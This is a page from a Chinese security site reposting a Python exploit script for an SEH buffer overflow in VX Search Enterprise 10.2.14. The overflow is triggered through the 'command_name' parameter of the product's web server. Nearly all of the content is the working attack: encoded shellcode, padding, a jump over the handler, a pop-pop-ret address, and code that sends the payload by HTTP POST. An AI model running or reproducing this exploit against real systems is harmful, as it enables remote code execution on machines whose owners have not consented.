首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 VX Search 10.2.14 - 'command_name' Buffer Overflow 来源：@wolfieroot 作者：W01fier00t 发布时间：2017-12-06   #!/usr/bin/python     print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) ***\n"   # Exploit Title     : VX Search Enterprise v10.2.14 Buffer Overflow (SEH) # Discovery by      : W01fier00t # Twitter           : @wolfieroot # Discovery Date    : 22/11/2017 # Software Link     : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe # Tested Version    : 10.2.14 # Tested on OS      : Windows 7 Home Edition sp1 # You will need to enable web server for this to work. # You will also need the Login to VX Search wepage, for this to work.   import urllib import urllib2 import socket   #Bad chars \x00\x0a\x0d #Payload size: 351 bytes shellcode = ( "\xdd\xc6\xb8\x4a\xec\xd2\xea\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1" "\x52\x83\xc5\x04\x31\x45\x13\x03\x0f\xff\x30\x1f\x73\x17\x36" "\xe0\x8b\xe8\x57\x68\x6e\xd9\x57\x0e\xfb\x4a\x68\x44\xa9\x66" "\x03\x08\x59\xfc\x61\x85\x6e\xb5\xcc\xf3\x41\x46\x7c\xc7\xc0" "\xc4\x7f\x14\x22\xf4\x4f\x69\x23\x31\xad\x80\x71\xea\xb9\x37" "\x65\x9f\xf4\x8b\x0e\xd3\x19\x8c\xf3\xa4\x18\xbd\xa2\xbf\x42" "\x1d\x45\x13\xff\x14\x5d\x70\x3a\xee\xd6\x42\xb0\xf1\x3e\x9b" "\x39\x5d\x7f\x13\xc8\x9f\xb8\x94\x33\xea\xb0\xe6\xce\xed\x07" "\x94\x14\x7b\x93\x3e\xde\xdb\x7f\xbe\x33\xbd\xf4\xcc\xf8\xc9" "\x52\xd1\xff\x1e\xe9\xed\x74\xa1\x3d\x64\xce\x86\x99\x2c\x94" "\xa7\xb8\x88\x7b\xd7\xda\x72\x23\x7d\x91\x9f\x30\x0c\xf8\xf7" "\xf5\x3d\x02\x08\x92\x36\x71\x3a\x3d\xed\x1d\x76\xb6\x2b\xda" "\x79\xed\x8c\x74\x84\x0e\xed\x5d\x43\x5a\xbd\xf5\x62\xe3\x56" "\x05\x8a\x36\xf8\x55\x24\xe9\xb9\x05\x84\x59\x52\x4f\x0b\x85" "\x42\x70\xc1\xae\xe9\x8b\x82\x10\x45\x93\x4a\xf9\x94\x93\x74" "\x98\x11\x75\xe2\x4a\x74\x2e\x9b\xf3\xdd\xa4\x3a\xfb\xcb\xc1" "\x7d\x77\xf8\x36\x33\x70\x75\x24\xa4\x70\xc0\x16\x63\x8e\xfe" "\x3e\xef\x1d\x65\xbe\x66\x3e\x32\xe9\x2f\xf0\x4b\x7f\xc2\xab" "\xe5\x9d\x1f\x2d\xcd\x25\xc4\x8e\xd0\xa4\x89\xab\xf6\xb6\x57" "\x33\xb3\xe2\x07\x62\x6d\x5c\xee\xdc\xdf\x36\xb8\xb3\x89\xde" "\x3d\xf8\x09\x98\x41\xd5\xff\x44\xf3\x80\xb9\x7b\x3c\x45\x4e" "\x04\x20\xf5\xb1\xdf\xe0\x05\xf8\x7d\x40\x8e\xa5\x14\xd0\xd3" "\x55\xc3\x17\xea\xd5\xe1\xe7\x09\xc5\x80\xe2\x56\x41\x79\x9f" "\xc7\x24\x7d\x0c\xe7\x6c")   #0x1001a136 : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [libspp.dll] cmdname = "\x90" *16 cmdname += shellcode cmdname += "A" * 157 cmdname += "\xEB\x06" cmdname += "B" *2 cmdname += "\x36\xa1\x01\x10"   print " [*] Sending payload!..." url = 'http://127.0.0.1/add_command?sid=f3fdf2603e9ac8f518db9452fee62110' values = {'command_name' : cmdname} data = urllib.urlencode(values) req = urllib2.Request(url, data)   try:     response = urllib2.urlopen(req, timeout = 1) except socket.timeout:     pass   print " [*] DONE! :D\n"   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Abyss Web Server < 2.11.6 - He ·WinduCMS 3.1 - Local File Disc ·Artica Web Proxy 3.06 - Remote ·Arq 5.9.7 - Local root Privile ·MistServer 2.12 - Cross-Site S ·Murus 1.4.11 - Local root Priv ·WinduCMS 3.1 Local File Disclo ·Arq 5.9.6 - Local root Privile ·SocuSoft Co. Photo 2 Video Con ·Hashicorp vagrant-vmware-fusio ·aws-cfn-bootstrap Local Code E ·Hashicorp vagrant-vmware-fusio   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved